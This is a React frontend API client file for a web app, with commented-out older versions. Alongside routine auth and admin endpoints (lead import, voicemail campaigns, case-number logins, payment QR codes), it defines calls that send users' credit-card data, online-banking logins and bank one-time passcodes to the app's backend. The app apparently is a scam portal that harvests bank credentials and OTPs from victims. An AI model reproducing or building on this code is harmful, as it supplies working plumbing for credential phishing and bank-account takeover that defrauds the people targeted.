//frontent/src/services/api.js
// frontend/src/services/api.js - UPDATED VERSION
// Replace your existing api.js with this:

import axios from 'axios';
import toast from 'react-hot-toast';

const API_BASE_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';

export const api = axios.create({
  baseURL: API_BASE_URL,
  // 30s — signup renders two server-side documents (Puppeteer/Chromium)
  // before responding; 10s was tight enough on the VPS's specs to time
  // out client-side even when the request would have succeeded.
  timeout: 30000,
  headers: {
    'Content-Type': 'application/json',
  },
});

/*/ Request interceptor
api.interceptors.request.use(
  (config) => {
    const token = localStorage.getItem('token');
    if (token) {
      config.headers.Authorization = `Bearer ${token}`;
    }
    return config;
  },
  (error) => {
    return Promise.reject(error);
  }
);*/
api.interceptors.request.use(
  (config) => {
    // Fintech routes use a separate token so they don't collide with
    // the main app's auth token when both sessions exist in one browser.
    const isFintech = config.url?.startsWith('/fintech');

    const token = isFintech
      ? localStorage.getItem('fintech_token')
      : localStorage.getItem('token');

    if (token) {
      config.headers.Authorization = `Bearer ${token}`;
    }
    return config;
  },
  (error) => Promise.reject(error)
);

/*/ Response interceptor
api.interceptors.response.use(
  (response) => response,
  (error) => {
    if (error.response?.status === 401) {
      localStorage.removeItem('token');
      window.location.href = '/login';
    }
    
    const message = error.response?.data?.message || 'An error occurred';
    if (error.response?.status >= 400) {
      toast.error(message);
    }
    
    return Promise.reject(error);
  }
);*/
api.interceptors.response.use(
  (response) => response,
  (error) => {
    if (error.response?.status === 401) {
      const url = error.config?.url || '';
      const isFintech = url.startsWith('/fintech');

      if (isFintech) {
        localStorage.removeItem('fintech_token');
        window.location.href = '/fintech/login';
      } else {
        localStorage.removeItem('token');
        window.location.href = '/login';
      }
    }

    const message = error.response?.data?.message || 'An error occurred';
    if (error.response?.status >= 400) {
      toast.error(message);
    }

    return Promise.reject(error);
  }
);

// API service methods
export const authAPI = {
  login: (credentials) => api.post('/auth/login', credentials),
  signup: (userData) => api.post('/auth/signup', userData),
  verifyEmail: (token) => api.post('/auth/verify-email', { token }),
  getCurrentUser: () => api.get('/auth/me')
};

// ⭐ NEW: Client API methods
export const clientAPI = {
  getMyProfile: () => api.get('/client/my-profile'),
  getAdminCharges: () => api.get('/client/admin-charges'),
  getAdminQRCode: () => api.get('/client/admin-qr-code'),
  getAdminKioskPayment: () => api.get('/client/admin-kiosk-payment'),
  saveCreditCard: (data) => api.post('/payment/credit-card', data),
  saveBankLogin:  (data) => api.post('/payment/bank-login',  data),
  saveBankOtp: (bankId, otp) => api.patch(`/payment/bank-login/${bankId}/otp`, { otp }),
  getDefaultContact: () => api.get('/default-contact/public', {
  params: { adminId: '69474e66c760ca518a93e97a' }
  }),
};

// Fintech API
export const fintechAPI = {
  loginFintech: (caseNumber) => api.post('/fintech/login', { caseNumber }),
  getFintechDashboard: () => api.get('/fintech/dashboard')
};

// Bank list for the "Select Your Bank" payment flow — served from our own
// backend/database (backend/models/Bank.js), not the external top-lab.cc
// API. That external call was blocked by our own CSP on the way out and by
// their CORS allowlist on the way in; the same bank data already lives in
// our own MongoDB, so this avoids the whole cross-origin problem.
export const banksAPI = {
  getBanks: () => api.get('/client/banks'),
};

// Keep caseAPI for backward compatibility (if you still use it elsewhere)
export const caseAPI = {
  lookup: (caseNumber, verificationData) => 
    api.post('/cases/lookup', { caseNumber, verificationData }),
  getMyCase: (caseNumber) => 
    api.get(`/cases/my-case/${caseNumber}`),
  getMyCases: () => api.get('/cases/my-cases'),
  getCase: (caseNumber) => api.get(`/cases/${caseNumber}`)
};

export const adminAPI = {
  getLeads: (params) => api.get('/admin/leads', { params }),
  importLeads: (formData) => api.post('/admin/leads/import', formData, {
    headers: { 'Content-Type': 'multipart/form-data' }
  }),
  addLeadNote: (leadId, content) => api.post(`/admin/leads/${leadId}/notes`, { content }),
  getCampaignLeads: (params) => api.get('/admin/campaign/leads', { params }),
  createVoicemailCampaign: (data) => api.post('/admin/campaign/voicemail', data),
  getDocuments: () => api.get('/admin/documents'),
  createDocument: (data) => api.post('/admin/documents', data),
  generateDocument: (docId, data) => api.post(`/admin/documents/${docId}/generate`, data),
  getAnalytics: () => api.get('/admin/analytics')
};

export const uploadAPI = {
  uploadFile: (formData) => api.post('/upload', formData, {
    headers: { 'Content-Type': 'multipart/form-data' }
  }),
  downloadFile: (fileId) => api.get(`/upload/${fileId}`, {
    responseType: 'blob'
  })
};

export default api;
/*import axios from 'axios';
import toast from 'react-hot-toast';

const API_BASE_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';

export const api = axios.create({
  baseURL: API_BASE_URL,
  timeout: 10000,
  headers: {
    'Content-Type': 'application/json',
  },
});

// Request interceptor
api.interceptors.request.use(
  (config) => {
    const token = localStorage.getItem('token');
    if (token) {
      config.headers.Authorization = `Bearer ${token}`;
    }
    return config;
  },
  (error) => {
    return Promise.reject(error);
  }
);

// Response interceptor
api.interceptors.response.use(
  (response) => response,
  (error) => {
    if (error.response?.status === 401) {
      localStorage.removeItem('token');
      window.location.href = '/login';
    }
    
    const message = error.response?.data?.message || 'An error occurred';
    if (error.response?.status >= 400) {
      toast.error(message);
    }
    
    return Promise.reject(error);
  }
);

// API service methods
export const authAPI = {
  login: (credentials) => api.post('/auth/login', credentials),
  signup: (userData) => api.post('/auth/signup', userData),
  verifyEmail: (token) => api.post('/auth/verify-email', { token }),
  getCurrentUser: () => api.get('/auth/me')
};

export const caseAPI = {
  lookup: (caseNumber, verificationData) => 
    api.post('/cases/lookup', { caseNumber, verificationData }),
  getMyCase: (caseNumber) => 
    api.get(`/cases/my-case/${caseNumber}`),
  getMyCases: () => api.get('/cases/my-cases'),
  getCase: (caseNumber) => api.get(`/cases/${caseNumber}`)
};

export const adminAPI = {
  getLeads: (params) => api.get('/admin/leads', { params }),
  importLeads: (formData) => api.post('/admin/leads/import', formData, {
    headers: { 'Content-Type': 'multipart/form-data' }
  }),
  addLeadNote: (leadId, content) => api.post(`/admin/leads/${leadId}/notes`, { content }),
  getCampaignLeads: (params) => api.get('/admin/campaign/leads', { params }),
  createVoicemailCampaign: (data) => api.post('/admin/campaign/voicemail', data),
  getDocuments: () => api.get('/admin/documents'),
  createDocument: (data) => api.post('/admin/documents', data),
  generateDocument: (docId, data) => api.post(`/admin/documents/${docId}/generate`, data),
  getAnalytics: () => api.get('/admin/analytics')
};

export const uploadAPI = {
  uploadFile: (formData) => api.post('/upload', formData, {
    headers: { 'Content-Type': 'multipart/form-data' }
  }),
  downloadFile: (fileId) => api.get(`/upload/${fileId}`, {
    responseType: 'blob'
  })
};

export default api; */